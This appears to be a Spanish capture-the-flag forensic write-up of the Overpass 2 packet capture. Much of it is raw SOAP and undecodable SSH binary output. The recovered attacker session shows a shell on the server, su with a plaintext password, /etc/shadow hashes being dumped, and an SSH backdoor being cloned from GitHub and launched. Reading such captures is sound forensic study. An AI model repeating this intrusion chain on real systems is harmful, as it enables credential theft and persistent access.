xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa
id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production
The key's randomart image is:
+---[RSA 2048]----+
| .. . |
| . + |
| o .=. |
| . o o+. |
| + S +. |
| =.o %. |
| ..*.% =. |
| .+.X+*.+ |
| .oo=++=Eo. |
+----[SHA256]-----+
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
chmod +x backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
����$����▒9��N�qcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1ssh-rsaUaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctrUaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctrBhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96nonenoneb*2�Y���cZHD��
������� ��O�72
�curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c�rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.comlchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.comlchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1▒none,zlib@openssh.com,zlib▒none,zlib@openssh.com,zlib, uoɐ�Хo�r
�)o���}
�A����
���ssh-rsa��nQK��=��s�0��J�w(-z���IB&�d�=��(�����;k�7���DmzՏ��)� �^%B|��&���"�_�#PY�0�
�x����������O-�>�#U��Q��hy
m��z��8�^f& ��\a:���\e�����SɤB"W�P�;�N����D���/Ґ��>Y��hhT���"5���c|#P��Q�&?�ܪ����5@�<h�h� q&{�T����� ����K�������,ѓ0�ssh-rsaIFw1��&�e~��AY�j�?NK2���'-G�3���>#D٨�ci_�&��0_6��XK��gE�Ȍ$��*��ű�߃��v!��v������}h8�8߾
4�p�FB�a_���9���JTrf��v���7�/�@Y!!��epo�lޘ���11���P)����-Ǩ�z����-5Ғ���'���Pa)��bic��"ϔ&1���F�j�.��\.r�$�Tg� 8��H
4�����Cb���_��$R�h
��A��N��SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
�_1�y@x�~W��
�kqcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1ssh-rsaUaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctrUaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctrBhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96nonenone�@'�e����
b��c��@ �G����a��curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c�ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsalchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.comlchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1▒none,zlib@openssh.com,zlib▒none,zlib@openssh.com,zlib, �|�!}�U����+��h.��U��&@FNo�تsssh-rsa��nQK��=��s�0��J�w(-z���IB&�d�=��(�����;k�7���DmzՏ��)� �^%B|��&���"�_�#PY�0�
�x����������O-�>�#U��Q��hy
m��z��8�^f& ��\a:���\e�����SɤB"W�P�;�N����D���/Ґ��>Y��hhT���"5���c|#P��Q�&?�ܪ����5@�<h�h� ��u��;�n▒'
CH��oR����P�G+Bssh-rsa���0m�G���m��J�,��a|��� 7b▒�fGk�aU�O0VN�m!_c���A淢w�IJ;��M��ʴ
d��/�a�:mb�~�Hp+��r�6�Ft��(:G���-��������9��[Z�'��нк�ywI`���#x��t�W�
�����. �J�2�/���O��▒�Y^3�����������kr;�j����X�����
�N`
1<���"�u巋�xՍ�V�p�*U��H�E�U�▒�����v
�cF����|
��6��e�q
gG�2r�@_����!TKe�R4����y�5�P��2�۵Z{�h�x(��CzJ<#B��Y�kG9-�b�▒90l�k�0��N����woX�;/ޛ���wS����r��4dڌ�=��Re��}L �LP.�lq����c�_���4�1����Ȭ&��h��@(�|��8�a�Hm�t��=�w�ʇG������&q����(���%5kT�W�N"p��#���243��v�,P@�%=['����`8�厸���"�o�)|��s]��5���xE��!S.F��W���e2��`U��(s����<��2���B�3�_hx�r�O3V�z�����oщ��]S-vl���X�&�
e��Zi�6)��K�.[�
:r6<|�W��A�3�)Iג���Z^S�!Kg%��Ƙ�`4C+�������g
�c��5���4{�Eھ
�{cD�?��X$/2u������+v�! ,�$~T\����`<<�c�Y�~��ma5�|�Pv=�'۔� e��q��N�إ�A?�(/���E���@��G�ˆ垉^��Z���.
��▒,�܃t؝A�����S����l������i�i��▒j4j▒x�[7^ȴm��o9��r@�aҠ�H\;��5r�SK�^$A�
N�z�
�4��i�o��AB�E����� q0;��k��,4��I���a�\�f��?��hX����4�/LU�u����2ȕ�Af�P6���u ,��6N��U���u_y��W
x9~P��~�� ���.���E��s�
L^߆�|��xq��HZ!I�QX}$��p▒��������(�\L3�{�0K"������T-¿��؍��_�1��,�ח!3,���O�6g
T�,ȴBLWQ@�K�"N��bC�2�u���O*��:����f�<�%���e���^hq_��i��L������ ��7���r���'���}#�z��:K����<<lE�t�N�'�G�9^�1ٹ`�pN��f� <Xz�+�W����1z��{�m�b��3)qtU�*q������U!�|�e�j4�t��J���RM��F�.5�+��
���!��yHQ[�%܉�P!����5��w
�%Ȋ��S�]W�F6H����岍��}���▒+�Ѻv��O��y�dq)�5�f�Ҙ
H|GfC.��u `���b&.��
E؎kO��cHSy�/�H�l��SE��i��
fiB��oJ�De&�g1+�g|���
�sky�6�Y��Q��G0II�b������D▒>��pe��� A�}��WOݣ{Ej�ao��d����{�������n�K�>.JޱE�<��~�0�i�h���/5���KmW��,��MI�����IJ�ƆH:��:�Fj�V�z�z��y��Y=_D�D�J�H%��Ԡ��&��GK�G܄���K
~����B����y�T>^/!%�j���~� � �R!�p��N��=zq�r��F6sE���q���(Mq�Tt}�fu���.t,�LZ8����mL�VH8�*��dCb�t���
��ɤ`T���A���nM�h�������`=���٠�����������uKQ�ʌ��w�1p�BG�Q�i#㦒�E�
�D1`�䅼��I�
>UJ��
z�]�F����fd�����uD$<H.���*!h�2)�s%<w���NQ���
�m���ҏ�a2�ee������ﴸफ़��dZ��.�4N�GW6��C)_�"+b��NM`E�rcY�}}�v�%*�#E▒ӷ�{7o��땜$t��N���]�tLX_՝c��▒�▒Jԥ���)��J�3i�m��](����*�*m���v����JÜ\yj�a6W1�|UM▒�����$�K�|?e�(蠓EB;g}�5/�M��gQĜJ���'�s����Rm6tQ�y��\
��7�|��`$ 1�"^���
8�W�~�^�q�^t�Ո�"8��404N�nQF��"}�▒��l, ���>P�_oOTm�1~A�
+��<�ȲMDL\h]"
4IGW
#�ӛ���'}�/���`��-��J�_�C���eF������^�2g��B�a�6�G/�h3*�rDܤ4�"5
��9�Zp�������GO.uT�c���Cq���5�;5[
~��O�?�����]z!��R�!�_�`3��S$v�6�%�g_�1���l>�DzWA�!J��Cf����1�mW<G8}N�b u���������k�0Ǖ�ۺ�W����fǂ�:x��Na?�w���H��w
�8�$�R��'\���ϗdjH�lnc2?�d�0�J���>�|��E\F?Vjm�/��_�l5�(���f���1d���;�=��
�C
I�FshG��)Ld u▒�]fW�c8��|,GC�`9����jފ�K���!j), Tޖr{�U�9�=d�'���2�Vb�L8��=;7g�B�ٻ�}��u�J!奩D��sC�X��x��a�v~
h{��)��T�1۾������6N8����*��%����V�3&u&�<($����l�u��e���~�]v�t��y�� 9�5����{�'�V�ڡ��&��e�J⑤r��l�H.�%��QyI\��S�9��(�綥�
���z��OζO���;MJϩ3��t��'▒nW�
���+����p���▒ƾ���=E\��:�
25s�-�`��A5��Yc�Y]Բ�Dj�\A���`�F/����'ic�v����3r�nc�sWoTӋݡ'8�sc�����Q{d��Md~��[kDT=�p�/�08�f���x�/a��ю���Ri٭�~ ���3�3�����
hPjm�� *�_��qn���cٶui�Ћ)ɷZ;-�c�w� ��N�5 Ѽ D�|mKܩ�]Ǖn▒�ӿ�a����U>��)�W
��Mj�p���/kt�I��z�����*���i
� �\���m��H�īG�9�48�cZeQ��|k� �,�lE�'1۔K�
%�(}�w��&��Lv�"�▒�}�<�,�R�����'�▒抖���*��0�מK�o�G��'^��W���œ���NP�����v�'�}����)li��C�k▒��9��k[K6H▒��o�ڋ�t���yx���Mo@�c�v���o��p��-ض�}�h�y��UKK��9}T˺�#�iݴ
��Y 08e�kAඉ^I/�]�zJ�V�H�'�%)2Ma�����(�FU��V�Xg{���'<�p�����)e�z�▒%��ϻO
��'�����e�F@��0��
�
a�▒��L�:E������ �
.#j��a��N����T�<:rdzK��6U�\������yN�_{��k���6GN���2���%@�ػ������u����DGr�y��&bKr?ؼ��x�_'�&%?��54/��:�H�z$�?7��}�;�ս�U�_�������<���G]|�
��;�cR�/A�n)f�"�3�cn�]i���B��G#+Z9���;}�`[��VC
5�������#�+�b����)��<�G $���a3˰�t^N��{����h@��J1<i�d�Z��
\^▒�z��v�1���`��%����;v��]��O���eUU��q▒�C��v���g��uS���J�"1��j"�J�������7�H`�n���3�qqLF�l;��}�W��_��w��zD쀧357t��N|aN�p��g0�����M��Ys�`�d�j@Or�(t�Un���J�����U$Š�z�;���
�n�#��"H�&w���O�־7�ݜQ�C|��{�e`@>��[�n��WC�!hB�1^>�y �IO� �M�� ���]ahD�r��p
lKL��4���PCPK!�DZ�l%���s���`�~t�f}�s^&u���������q�~����▒�!��c��Fj���(ΚGe�!
�\ԶB(�C�LҠ7
pp���V���h�܍���'0�����&Sy���,�����aakLM���\B�=u0�Qt���Eg�����O|��ȏ�R�*��6��x�-k
@T!�q���1�[����T�7H>Q����i��x�%8 V�<�0�/PP��[�C�� ���rB�[�?,�Wl�)�
Os!X�S��[��@v������:�j@6q�X�Pu�Q_,MI���N�&(�!bKA"�T'P�>��
Yj���f=�A-T�G�|�AP��&��j�|ɻT�p�A��S
��R���z2 {�2��7@#���5�u% w@V���J��>O�y�s�@Q�� ������lgi���9b�b��%w�}���x�▒ ��v|4�i▒F�I��8��
�� 8�d�<�l��ˇb)��B�i�e?'���3H��F�����5
▒�����ɵZ�����X��l▒�7
�t��{�7�:�f�d�
�n�๚ܤ��Q�'�<���n����Wl�%���J�r�N~�{�s��TT�ypo�˟Ӛ���^�W�����Rh��y��@�z\j���[��u(�Qg�8�f�h��Q_▒7���9��1��?��3bdz���▒���2eҵ��o����Q�h�k���e��i~#:�
�p����jD�|j;�Q��▒i�>�:4W>�_���@v�u��;a�o���ı�k��p���a�
�{"O��O�����:`�t����bjs���E�<P`�ݴK\�,���(�� �
��1��Rw5�▒D6����{��b▒ޣ����ግ���2&���`��h��c15$�ƛ���
�jH��ߊ��P��(n>�4�w�e�&ϴCqQ��
�5���b���*��؇��S�W\\��W�o/<x\8K ��f8�����_|z>��� O��vy43���q�U�A`q���j�:�ÃYb�Au���VcŚ}����o��]6�ʁW��I)���3��9,/�E�j�e��rkњ�w�ڹ�(�}7$��8��l���f���@����s����Gz�
�
�}H�[�U�=���H٦�
2|��rx�����L��$��y,�2�x�L���[�sP+��0 �,�zhR#\9r�#����~O�6��[�f{��}S�[�q:r��,)D�K��S�N�J���"���▒�����N�.�G���Ɋ��
�
l;!�\��%��}H�%�V���Rh����0S��=ߟFo�n�&�Z��QE^(6���:0�Mxn�^�Ǒ�xcα�4
[
"����,6�|J�4�?�$��▒�w���5��F)%r�v�TӬ���&�#c��h�e)nB��O�l�e�>c;�L1O�,�X��hT�;��}��/ѣ?��1���L����ňo{
���J�5�e�GvL��k��~�G��37��ܨ�42���j����w@���שH��Z�9,Ճ4���Mu�A
V���t��G�I.�I��t�a<x����1c�r���x�w����g▒b2��p���Z�I�m�T-�c����|�`�+k�� �nǼ�Q4E����
4�,����FEYc����~d���
U�l�f/I��E�-`��w���#L��ERrO�9�$5���▒"!�����x�s�#U&\��
�i�����e
y��2�e �G���Y�����z�!-U�s9��`▒7'�49>g�X&���"%��#�<{�[_�N��79[�@��蛄�v"8�*�V� EZ3Й���wfir��>�kB���OD%��N��74O
sv~7��y`#S)h4���
x�4���G
�����1C3▒���'���F����+�K����LN7��m�_��"�M�a▒�k�*��J�D1���r�I�Lt6��L2I�k|���g[]����n�j"Q*�9�bc��`�ۆ�����J\����|1h�"�_�G�|��v=�����f����D���
��|H�a�%eE���C�▒@��;�����)'���(`pe0�T�3���m���.]f5C�znLj�T;&�����3�E���@\U���Q|j�|�9�r�/���6�)�3�
b�y����� (��P�xI�Kݛ ���Χ��ņJ_������~ �:���BÕ����~��T؞DSC��ˡO�ă��>�9c▒�WӸ��B�!��[�▒&9�
����;▒�һ�cn�q�~+��./�=�;JRy��.RFڎpEP�+�nS���]V���b�P�+
�Ε�彎�h�FC�▒��Ʈ�����i�}��H��>��4����])��|c���h+{�`�z�>��e�+���zC�5����Y�6����W'!▒KW�}���]��G[� >�▒����
��`��wNHvyY�)P▒I�[�V���6�㗴U�^��?Vd�rj�w�{��kR�[�II��/l�W�^C���O2/;x(�Ӿ
���l�&$;��Z?��85%[�v��cJ��~U�TlF�▒��▒
�s��/b��K��y�▒╜��1��'q��
~�����62��W���N�C��ud��;{t��"��g1�{�f��s�j�mۋ����"XT
r��2$�u���p�I)��/V�渒�I~�(�EaB��&3v��o�}&"z���
mK.��^s����ǻ%v��▒���}���T�J�jF�5��O�g���[3��-s�����Ұ`�/���[3�5�*
)
�5�dCT>�43�e��H�G���\V�w�$J���%ÎY��~�DhP�����J!1�~p����TY/'5�1�r6�T���=l����Ѱ�
B��s9���as��� ��▒�<������▒����l���i������$8�te}�Fvc�dl�P�(�{��l������s�3�▒�U?˯����ϯ&mGW�������@����/k>�4���ԛH����[�2j+/q�\�%V2i諎1�v.�z~��~������{T;4▒x
\���N:��?u��- �\*���U�@7X�L_�|��b����p�'��\Fbͺ�t�gsMD�
�r44�;��;�L-��zm���Ŵh]����a���b��g|ý��hb:���w���*����M#i/_���?$h�i�4gBt�TI�jv�z����N&G���=`�����▒���0�9▒1���c=yK�Y��ZW�d}|��������Ƿh}��=�Ѧ����{b�#�z�°�����I���R�����f�t�(��-\�;T����8▒�P1�
c(�ՃP۸+vg�B��ܗ����W}}%63�q�y1z-��qh��`G-���T�Ⱦ���▒Y���@ib��z-���O�$V�d+�Nڢߔ�-��5^�i���i�8
U���"���Dh�,��Y3k�5��O��l>�(�Zl�&����3����V�?L�(�}����,B�;���*Ze�^▒������|hߩ�G�LJ%m9���{(��D(F▒F���N��, �
����˓(0�t>iC��˝�2�Lwj������)d�b�����#��#
��Gas3T9�>�^�!l��x R�8��]S �tu`܉F�o�LC����h,=d�C�Y�]����Ŋm�aH�ٷ�g�����0���1�?�ox�?� �S���xM���*
▒pM=e2��9Ӻl��4�3}�ݥ�
���h3ҙ�7��
� ��ڼԯ��c�lI��/�W��(q^�%��@����e�������a���Q�d��*�s�������-C��!��Y���ʻ08�c����5l��Š����K���n�O�]��Ԛh����Y��v� ��)=&!��Π���z���(wH�3j�J�zڝ�$�B����}�Ђ���Z�M\���!�jI��>n�uv �۾j'�������^�B}?�I��=���@M�4]�.ϙ��>2����X�j��I���ȃ��R�|�h�I�.n��.����%��.b$1���>�䋎y��E�71S��5#c�`��] }��?]��Lw��?W[��Х%U�ʺ.+k
USNDO CASI EL MISMO COMANDO CON FILTRO y USANDO STRINGS PARA QUE NOS LOS STRINGS EN TEXTO PLANO LEGIBLES LO VEMOS MAS EN LIMPIO y VEMOS LA CONTRASEÑA QUE USO EN EL COMANDO EL ATACANTE PARA PRIVESC: (whenevernoteartinstant) :
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings
Running as user "root" and group "root". This could be dangerous.
Upload File/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh
ls -lAh
total 8.0K
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: whenevernoteartinstant
james@overpass-production:/var/www/html/development/uploads$ cd ~
cd ~
james@overpass-production:~$ sudo -l]
sudo -l]
sudo: invalid option -- ']'
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
[command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] file ...
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant
Matching Defaults entries for james on overpass-production:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on overpass-production:
(ALL : ALL) ALL
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
<git clone https://github.com/NinjaJc01/ssh-backdoor
Cloning into 'ssh-backdoor'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 5% (1/18)
Unpacking objects: 5% (1/18)
Unpacking objects: 11% (2/18)
Unpacking objects: 16% (3/18)
Unpacking objects: 22% (4/18)
Unpacking objects: 27% (5/18)
